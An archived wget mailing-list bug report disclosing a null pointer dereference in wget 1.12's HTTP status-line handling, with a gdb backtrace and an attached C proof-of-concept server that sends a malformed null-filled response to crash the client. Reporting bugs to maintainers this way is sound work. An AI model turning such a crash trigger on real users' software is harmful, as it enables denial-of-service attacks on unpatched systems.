[Top][All Lists]
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Bug-wget] wget bug report
From: |
Ildar Isaev |
Subject: |
[Bug-wget] wget bug report |
Date: |
Fri, 14 May 2010 22:48:29 +0400 |
User-agent: |
Thunderbird 2.0.0.21 (X11/20090409) |
Hi, i downloaded wget-1.12 from ftp://ftp.gnu.org/gnu/wget/wget-1.12.tar.bz2
It turns out it has a null pointer dereference bug. This is how it may
be reproduced.
Expl_for_wget.c (attached) is a small pseudo web server. Compile it and run:
address@hidden:$ gcc -Wall expl_for_wget.c -o expl_for_wget
address@hidden:$ ./expl_for_wget &
[1] 7330
address@hidden:$ gdb --args <path_to_wget_install_dir>/bin/wget
http://127.0.0.1:3500/
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later
<http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
(gdb) run
[Thread debugging using libthread_db enabled]
--2010-05-14 22:39:36-- http://127.0.0.1:3500/
Connecting to 127.0.0.1:3500... connected.
HTTP request sent, awaiting response... [New Thread 0x403a26c0 (LWP 7332)]
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x403a26c0 (LWP 7332)]
0x40286613 in strlen () from /lib/tls/i686/cmov/libc.so.6
(gdb) bt
#0 0x40286613 in strlen () from /lib/tls/i686/cmov/libc.so.6
#1 0x08081a2d in xstrdup (string=0x0) at xmalloc.c:117
#2 0x08063c7d in gethttp (u=0x8a280e8, hs=0xbffa8be0, dt=0xbffa8f24,
proxy=0x0, iri=0x8a27d40) at http.c:1832
#3 0x08066151 in http_loop (u=0x8a280e8, newloc=0xbffa8dec,
local_file=0xbffa8dd8, referer=0x0, dt=0xbffa8f24, proxy=0x0,
iri=0x8a27d40) at http.c:2581
#4 0x08072798 in retrieve_url (orig_parsed=0x8a280e8, origurl=0x8a27dd8
"http://127.0.0.1:3500/", file=0xbffa8f2c,
newloc=0xbffa8f28, refurl=0x0, dt=0xbffa8f24, recursive=false,
iri=0x8a27d40, register_status=true) at retr.c:692
#5 0x0806c46e in main (argc=2, argv=0xbffa9014) at main.c:1294
(gdb) up
#1 0x08081a2d in xstrdup (string=0x0) at xmalloc.c:117
117 return xmemdup (string, strlen (string) + 1);
(gdb)
#2 0x08063c7d in gethttp (u=0x8a280e8, hs=0xbffa8be0, dt=0xbffa8f24,
proxy=0x0, iri=0x8a27d40) at http.c:1832
1832 hs->message = xstrdup (message);
(gdb) list
1827 resp = resp_new (head);
1828
1829 /* Check for status line. */
1830 message = NULL;
1831 statcode = resp_status (resp, &message);
1832 hs->message = xstrdup (message);
1833 if (!opt.server_response)
1834 logprintf (LOG_VERBOSE, "%2d %s\n", statcode,
1835 message ? quotearg_style (escape_quoting_style,
message) : "");
1836 else
(gdb) p message
$1 = 0x0
One can see that null pointer dereference occurs at http.c:1832 as
'message' is equal to null.
Best regards,
Ildar
/* Server code in C */
//exploit_13
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
int main(void)
{
struct sockaddr_in stSockAddr;
int sfd = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sfd == -1)
{
perror("can not create socket");
exit(EXIT_FAILURE);
}
memset(&stSockAddr, 0, sizeof(struct sockaddr_in));
stSockAddr.sin_family = AF_INET;
stSockAddr.sin_port = htons(3500);
inet_pton(AF_INET, "127.0.0.1", &stSockAddr.sin_addr);
int bindRes = bind(sfd, (const struct sockaddr*)&stSockAddr, sizeof(struct
sockaddr_in));
if(bindRes == -1)
{
perror("error bind failed");
close(sfd);
exit(EXIT_FAILURE);
}
int listenRes = listen(sfd, 10);
if(listenRes == -1)
{
perror("error listen failed");
close(sfd);
exit(EXIT_FAILURE);
}
int cfd = accept(sfd, NULL, NULL);
char buf[227] =
{0x48,0x54,0x54,0x50,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0A,0x0A,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};
write(cfd, buf, 227);
close(cfd);
return 0;
}
- [Bug-wget] wget bug report,
Ildar Isaev <=